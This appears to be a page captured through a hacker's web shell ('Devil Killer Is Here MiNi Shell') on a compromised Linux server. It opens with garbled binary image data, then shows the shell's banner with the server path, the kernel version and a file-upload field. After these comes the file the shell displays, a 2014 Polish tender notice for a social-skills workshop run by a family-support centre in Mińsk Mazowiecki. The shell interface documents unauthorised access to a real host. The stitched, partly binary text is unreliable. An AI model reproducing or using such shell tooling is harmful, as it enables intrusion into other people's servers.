JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140708/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140708/227854-N-2014.html

<p class="kh_header"><b>Mińsk Mazowiecki: Prowadzenie i organizacja Wyjazdowego warsztatu kompetencji społecznych 
w ramach  projektu Wsparcie na starcie.</b><br>
<b>Numer ogłoszenia: 227854 - 2014; data zamieszczenia: 08.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Konstytucji 3 Maja 16, 05-300 Mińsk Mazowiecki, woj. mazowieckie, tel. 25 756 40 26, faks 25 756 40 26.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie i organizacja Wyjazdowego warsztatu kompetencji społecznych 
w ramach  projektu Wsparcie na starcie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie Wyjazdowego warsztatu kompetencji społecznych dla 20 uczestników/uczestniczek projektu oraz 2 opiekunów ze strony Zamawiającego. Zadanie należy wykonać w terminie 25.08.2014 do 29.08.2014 r. Zajęcia warsztatowe będą trwać 16 godzin dydaktycznych. Miejsce realizacji zadania:  województwo pomorskie.
Uczestnikami/uczestniczkami projektu Wsparcie na starcie w stosunku, do których zaplanowano ww. działania są osoby niepełnosprawne ruchowo i/lub intelektualnie, usamodzielniający się wychowankowie placówek opiekuńczo-wychowawczych i rodzin zastępczych, młode osoby bezrobotne - osoby zagrożone wykluczeniem społecznym, korzystające ze świadczeń pomocy społecznej, osoby w wieku aktywności zawodowej (15-64 lat), zamieszkujące w powiecie mińskim. Odbiorcami usługi są osoby bezrobotne, nieaktywne zawodowo jak i osoby zatrudnione. 
Wyjazd w dniu 25.08.2014 r. powinien odbywać się w godzinach porannych, powrót w dniu 29.08.2014 r. powinien odbywać się w godzinach popołudniowych (po obiedzie). 
Program warsztatu powinien obejmować zajęcia z zakresu budowania pozytywnego myślenia, budowania poczucia własnej wartości, radzenia sobie z trudnymi sytuacjami w pracy i życiu, sposobów rozwiązywania konfliktów i radzenia sobie ze stresem (techniki relaksacyjne). Program powinien uwzględniać indywidualne potrzeby kobiet i mężczyzn. 
Program wyjazdu zawierający program warsztatu Wykonawca składa wraz z ofertą. 
Program warsztatu kompetencji społecznych powinien uwzględniać m.in.:
a)	Cele warsztatu,
b)	Zakres tematyczny (tematy zajęć edukacyjnych),
c)	Metody i techniki pracy, 
d)	Miejsce przeprowadzenia zajęć (adres, informacje nt. powierzchni, wyposażenia w sprzęt),
e)	Harmonogram realizacji ze wskazaniem dat rozpoczęcia i zakończenia zajęć, ilości trwania zajęć w poszczególnych dniach z podaniem tematu zajęć i osoby/osób, która/e w danym dniu będzie prowadzić zajęcia,
f)	Propozycje materiałów, które przechodzą na stałe dla uczestników/uczestniczek warsztatu 
(o których mowa w pkt. 3 - zobowiązania wykonawcy).
Program wyjazdu powinien uwzględniać(według załącznika): 
a)	Informacje o miejscu wyjazdu (adres, informacje o zakwaterowaniu itp.),
b)	Program  zajęć integracyjno-rozrywkowych (o których mowa w pkt. 7 - zobowiązania wykonawcy),
c)	Program całodniowej wycieczki (o którym mowa w pkt. 8 - zobowiązania wykonawcy),
d)	Program wyjść nad morze.
Wykonawca zobowiązany jest do:
1. Zapewnienia osoby/osób gwarantującej/ych prawidłową organizację warsztatu - 2 psychologów spełniających wymagania określone w rozdziale XII pkt. 3b.
2. Zapewnienia sali konferencyjnej do prowadzenia warsztatów kompetencji społecznych przeznaczonej dla jednorazowego użytkowania przez minimum 20 osób, wyposażonej w sprzęt audio-video, rzutnik multimedialny, ekran, w stoły, krzesła, tablice, dostępne wraz 
z wyposażeniem tylko dla potrzeb warsztatu. Wykonawca zapewnia odpowiednie warunki 
do nauki w  oparciu o zasady BHP. 
3. Zapewnienia dla każdego/każdej uczestnika/uczestniczki materiałów szkoleniowych (teczka, skoroszyt, długopis - jeden egzemplarz należy przekazać Zamawiającemu) oraz materiałów dydaktycznych (minimum jedna książka o treściach zgodnych z tematyką szkolenia). Propozycje materiałów Wykonawca przedstawia w programie. Materiały przechodzą na własność uczestników/uczestniczek projektu. Materiały mają być opatrzone w logotypy Programu Operacyjnego Kapitał Ludzki oraz logo Unii Europejskiej wraz z odniesieniem (podpisem) Europejski Fundusz Społeczny oraz formułę Zakupiono ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013. Uczestnik/uczestniczka potwierdza odbiór materiałów na podstawie listy potwierdzającej, przygotowanej przez Wykonawcę (logowanych zgodnie z wytycznymi POKL).
4. Zapewnienia bezpiecznego transportu uczestnikom/uczestniczkom i opiekunom warsztatów 
i ich bagażu (od miejsca wyjazdu tj. adres Zamawiającego, do miejsca przeprowadzenia warsztatów i z powrotem, a także przejazdów taborem autobusowym sprawnym technicznie, 
z klimatyzacją, posiadającym ubezpieczenie OC, NNW oraz aktualne badania techniczne, spełniającym wszystkie wymogi bezpieczeństwa zgodnie z przepisami o transporcie drogowym (w tym wymagane prawem zezwolenia i licencje dla firmy przewozowej), obsługiwanym przez kierowców posiadających odpowiednie wymagania do kierowania pojazdami i samochodami służącymi do przewozu osób. Dodatkowo w ramach przejazdu Wykonawca zapewni:
a. sprawdzenie w dniu wyjazdu stanu technicznego pojazdu przewożącego uczestników/uczestniczki oraz opiekunów warsztatu oraz kierowcy przez Policję.  W sytuacji, 
gdy autokar przewożący nie uzyska stosownego zaświadczenia Wykonawca musi zapewnić autokar zastępczy o tej samej klasie. W przypadku nie wykonania usługi przewozu zgodnie 
z powyższymi wymogami, Zamawiający ma prawo skorzystać z usługi przewozu innej firmy, obciążając kosztami przewozu Wykonawcę.
b.  suchy prowiant i napoje w drodze powrotnej (dla każdej osoby: 0,5 l. wody niegazowanej, owoc, batonik, 2 kanapki) dla wszystkich uczestników/uczestniczki i opiekunów.
5. Zapewnienia zakwaterowania uczestnikom/uczestniczkom i opiekunom warsztatu w pokojach dwuosobowych, z pełnym węzłem sanitarnym tj. umywalka, wc, natrysk lub wanna. Każdy pokój musi być wyposażony w TV. Uczestnicy/uczestniczki zakwaterowani powinni być w jednym budynku w ośrodku położonym nad polskim morzem, w woj. pomorskim, w hotelu co najmniej trzygwiazdkowym lub w ośrodku rekreacyjno-szkoleniowym spełniającym standard hotelu trzygwiazdkowego (m.in. pokoje z łazienkami, klimatyzacją, pokoje wyposażone w jednoosobowe łóżka z pościelą, ręcznikami, wyklucza się łóżka piętrowe). Hotel powinien być położony w odległości max 1 km od morza (licząc drogą), a w przypadku dalszej odległości zostanie zapewniony transport wliczony w cenę usługi. Ośrodek powinien posiadać zaplecze rekreacyjno-sportowe (boiska sportowe [siatkówka albo koszykówka albo kometka], ping-pong, sauna,  grill, ogródek). Dla uczestników/uczestniczek ww. zaplecze  będzie dostępne bezpłatnie. Zamawiający zastrzega sobie prawo wizji lub kontakt telefoniczny ze wskazanym przez Wykonawcę obiektem w celu określenia zgodności opisu obiektu ze stanem faktycznym.
6. Zapewnienia wyżywienia uczestnikom/uczestniczkom i opiekunom warsztatu: 4 śniadań i 4 kolacji (min. po jednym daniu ciepłym) w formie stołu szwedzkiego, 5 obiadów dwudaniowych 
z napojami. Każdy obiad składać się ma przynajmniej zupy (min. 350 ml/os.) oraz dania głównego: ziemniaki/ryż/kasza min. 200 gram/os., sztuka mięsa bądź ryby (min. 150 gram/os.), warzywa gotowane/surówka. Podane gramatury są już po obróbce termicznej. Obiad dla każdego uczestnika/uczestniczki podawany będzie ciepły. Wyżywienie powinno spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia a posiłki powinny zapewnić 100% całodziennego zapotrzebowania na energię i składniki odżywcze. Wykonawca zapewnia również serwis kawowy stale dostępny w godzinach realizacji zajęć warsztatowych, który zawierać będzie: kawę, herbatę i dodatki (cukier, śmietanka, cytryna), napoje, ciasteczka/ciasta, ponadto zimne napoje tj. woda niegazowana w ilości 1,5 l na jedną osobę dziennie. 
7. Zapewnienia uczestnikom/uczestniczkom i opiekunom warsztatu kulturalnych i rekreacyjnych form spędzania czasu poza zajęciami w tym między innymi zorganizowanie zajęć integracyjno-rozrywkowych przy muzyce (min. jedna dyskoteka, min. jedno ognisko/grill), zajęć kulturalnych.
8. Zorganizowania całodniowej wycieczki dla uczestników/uczestniczek i opiekunów warsztatów do interesujących  miejsc turystycznych, pomników kultury i przyrody, zabytków architektury sakralnej i świeckiej. Wycieczka powinna obejmować koszty przejazdu, przewodników turystycznych, obiadu, napojów, biletów wstępu. Plan wycieczki Wykonawca dołączy do oferty.
9.    Zorganizowania min. dwóch wyjść nad morze, zapewnienia opieki ratownika wodnego. 
10. Ubezpieczenia uczestników/uczestniczek i opiekunów warsztatów na okres pobytu 
i przejazdu od następstw nieszczęśliwych wypadków powstałych w związku z uczestnictwem 
w tej formie wsparcia, według imiennej listy uczestników przygotowanej przez Zamawiającego.  Przed rozpoczęciem warsztatów Wykonawca przekaże Zamawiającemu potwierdzoną 
za zgodność z oryginałem polisę ubezpieczeniową. Skutki niedopełnienia ubezpieczenia ww. osób ponosi Wykonawca. 
11. Przestrzegania przepisów o ochronie danych osobowych, zgodnie z ustawą 
z dnia 29 sierpnia 1997 r. o ochronie danych osobowych podczas wykonywania przedmiotu umowy.
12. Przechowywania dokumentacji związanej z realizacją umowy do 31 grudnia 2020 r. w sposób zapewniający dostępność, poufność i bezpieczeństwo. W przypadku zmiany adresu archiwizacji dokumentów Wykonawca zobowiązany jest do poinformowania Zamawiającego o nowym adresie archiwizacji a w przypadku zakończenia działalności przed 31 grudnia 2020 r. przekazania ich do Archiwum Państwowego. 
13.do przekazania Zamawiającemu w terminie 14 dni od zakończenia zajęć dokumentacji potwierdzającej realizację zadania. 
W ramach zadania Wykonawca zobowiązuje się również do:
1.	Należytego zrealizowania zajęć według oferty przygotowanej na podstawie SIWZ.
2.	Bezpłatnego przekazania uczestnikom/uczestniczkom projektu systemowego Wsparcie na starcie materiałów dydaktycznych. Uczestnik/uczestniczka potwierdza odbiór materiałów na podstawie listy potwierdzającej, przygotowanej przez Wykonawcę (logowanych zgodnie 
z wytycznymi POKL).
3.	Przekazania uczestnikom/uczestniczkom informacji o współfinansowaniu projektu przez Europejski Fundusz Społeczny w ramach Programu Operacyjnego Kapitał Ludzki realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Mińsku Mazowieckim Wsparcie na starcie Priorytet VII Działanie 7.1 Poddziałanie 7.1.2 Rozwój
 i upowszechnienie aktywnej integracji przez powiatowe centra pomocy rodzinie.
4.	Monitorowania obecności uczestników/uczestniczek poprzez bieżące informowanie (telefonicznie, drogą elektroniczną listowną lub fax) Zamawiającego o przypadkach braku obecności na zajęciach.
5.	Dokumentowania pracy poprzez:
a) dziennik zajęć zawierający opis merytoryczny zajęć (warsztat, zajęcia rekreacyjne), daty wykonania zajęć oraz łączne liczby zrealizowanych godzin zegarowych, dziennik zajęć opatrzone mają być w logotypy Programu Operacyjnego Kapitał Ludzki oraz logo Unii Europejskiej wraz z odniesieniem (podpisem) Europejski Fundusz Społeczny oraz formułą Zajęcia współfinansowane przez Unię Europejską  ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał  Ludzki 2007 - 2013. Dziennik zajęć Wykonawca przedkłada wraz z końcowym  rachunkiem rozliczającym usługę. 
b) Listy obecności uczestników/uczestniczek projektu na zajęciach. Listy mają być opatrzone w logotypy Programu Operacyjnego Kapitał Ludzki oraz logo Unii Europejskiej wraz 
z odniesieniem (podpisem) Europejski Fundusz Społeczny oraz formułą Zajęcia współfinansowane przez Unię Europejską  ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał  Ludzki 2007 - 2013. Listy obecności Wykonawca przedkłada wraz z końcowym  rachunkiem rozliczającym usługę.
c) Listy odbioru posiłków oraz materiałów szkoleniowych i dydaktycznych (dotyczy zadania nr 4). Listy mają być opatrzone w logotypy Programu Operacyjnego Kapitał Ludzki oraz logo Unii Europejskiej wraz z odniesieniem (podpisem) Europejski Fundusz Społeczny oraz formułą Zajęcia współfinansowane przez Unię Europejską  ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał  Ludzki 2007 - 2013. Listy Wykonawca przedkłada wraz z końcowym  rachunkiem rozliczającym usługę. 
d) Zdjęcia dokumentujące przebieg zajęć, które należy dostarczyć po wykonanej usłudze na płycie CD/DVD (min. 20 fotografii z różnych etapów realizacji zadania)
6.	Sporządzenia i  wydania Zamawiającemu zaświadczeń o ukończeniu zajęć. Zaświadczenia mają być opatrzone w logotypy Programu Operacyjnego Kapitał Ludzki oraz logo Unii Europejskiej wraz z odniesieniem (podpisem) Europejski Fundusz Społeczny oraz formułę Zajęcia współfinansowane przez Unię Europejską  ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał  Ludzki 2007 - 2013.  Zaświadczenia powinny być wydawane na nazwisko każdego/każdej z uczestników/uczestniczek projektu.  Zaświadczenia powinny zawierać ramowe terminy wykonanej usługi, łączną liczbę godzin, jaka obejmowała usługa oraz cele, jakie udało się dzięki niej osiągnąć.  
7.	Oznakowania miejsca przeprowadzanych zajęć oraz wszelkich dokumentów związanych z organizacją zajęć zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki tj. umieszczania informacji w miejscu wykonywanej usługi informacji poprzez formułę: Zajęcia współfinansowane są przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013 oraz logotypu Programu Operacyjnego Kapitał Ludzki oraz logo Unii Europejskiej wraz z odniesieniem (podpisem) Europejski Fundusz Społeczny.
8.	Wyznaczenia osoby do kontaktu z Zamawiającym, odpowiedzialnej za dbałość o wysoką jakość zajęć i upoważnionej do podejmowania wiążących decyzji w kwestiach związanych 
z realizowaniem umowy.
9.	Umożliwienia przeprowadzenia kontroli projektu przez Zamawiającego jak i inne instytucje kontrolne wyznaczone przez Instytucję Pośredniczącą (Mazowiecką Jednostkę Wdrażania Programów Unijnych we Warszawie) i Instytucję Zarządzającą (ministra właściwego                      ds. rozwoju). 
10.	Badania ewaluacyjne dotyczące poziomu satysfakcji, poprawy stanu psychofizycznego, podniesienia umiejętności i kwalifikacji zawodowych, podniesienie samooceny i pewności siebie uczestników/uczestniczek projektu wykonywane będą przez Zamawiającego, 
a Wykonawca wyraża zgodę na ich wykonanie oraz upublicznienie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonania oceny spełnienia tego warunku: Warunek zostanie spełniony jeśli Wykonawca przedłoży podpisane Oświadczanie o spełnieniu warunków udziału 
w postępowaniu oraz 	aktualny odpis z właściwego rejestru  albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykonanie w okresie ostatnich trzech lat,  przed upływem terminu składania ofert, 3 usług obejmujących grupę osób nie mniejszą niż 10 w każdym szkoleniu/warsztacie odpowiadających swoim rodzajem (tj. o nazwie tej samej lub zbliżonej do przedstawionej w niniejszej SIWZ) przedmiotowemu zadaniu (pojęcie nazwa tożsama 
lub zbliżona oznacza trening kompetencji i umiejętności społecznych, warsztaty psychologiczne, trening komunikacji interpersonalnej, warsztaty zajęcia psychoedukacyjne, a także nazwy będące innymi zestawieniami słów występujących w powyższej występujących nazwach). Ocena spełnienia warunku odbędzie się na zasadzie spełnia lub nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, że Wykonawca dysponuje odpowiednim potencjałem technicznym.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b)Zadanie zrealizują psycholodzy Wykonawcy, którzy posiadają odpowiednie kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia. 
Osoby przewidziane do realizacji zamówienia powinny posiadać dyplom magistra psychologii uzyskany w polskiej uczelni lub uzyskane za granicą wykształcenie uznane za równorzędne
w Rzeczypospolitej Polskiej. Zamawiający dokona oceny na podstawie oświadczenia zawartego w załączniku.
Osoby przewidziane do realizacji zamówienia powinny posiadać co najmniej 3 letnie doświadczenie w prowadzeniu zadań o tematyce zbliżonej do przedstawionej w SIWZ (termin tematyka zbliżona oznacza, że prowadzone zajęcia zawierały co najmniej 2 tematy z tematów wyszczególnionych w rozdz. III, pkt 1, 4) i zrealizowały w tym okresie min. 3 usługi. Zamawiający dokona oceny na podstawie oświadczenia zawartego w załączniku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia ( zał.  do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie wykonawcy - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy w następujących przypadkach:
1.	przy rezygnacji albo zwiększeniu liczby osób przed rozpoczęciem realizacji zadania wynagrodzenie zostanie pomniejszone albo powiększone o iloczyn ilości osób i wynagrodzenia za jedną osobę. W każdym przypadku Wykonawca zobowiązany jest niezwłocznie powiadomić na piśmie Zamawiającego o zmianie ilości osób, Zamawiający zobowiązany jest niezwłocznie powiadomić Wykonawcę o zmianie ilości osób. 
2.	w przypadku zmiany osób wskazanych w ofercie do wykonywania zamówienia z przyczyn niemożliwych wcześniej do przewidzenia, pod warunkiem posiadania przez nich wymaganych  kwalifikacji - na wniosek Wykonawcy  po uzgodnieniu w formie pisemnej z Zamawiającym.
3.	w przypadku zmiany miejsca wykonywania zamówienia pod warunkiem, że nowe miejsce wykonania zamówienia zlokalizowane zostanie w miejscu równoważnym lub korzystniejszym niż wskazane w ofercie i będzie spełniało wszystkie warunki, wskazane przez zamawiającego w opisie przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr-minskmaz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie ul. Konstytucji 3 Maja 16, 05-300 Mińsk Mazowiecki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.07.2014 godzina 09:00, miejsce: Powiatowe Centrum Pomocy Rodzinie ul. Konstytucji 3 Maja 16, 05-300 Mińsk Mazowiecki
pok. 106 -sekretariat.</p>
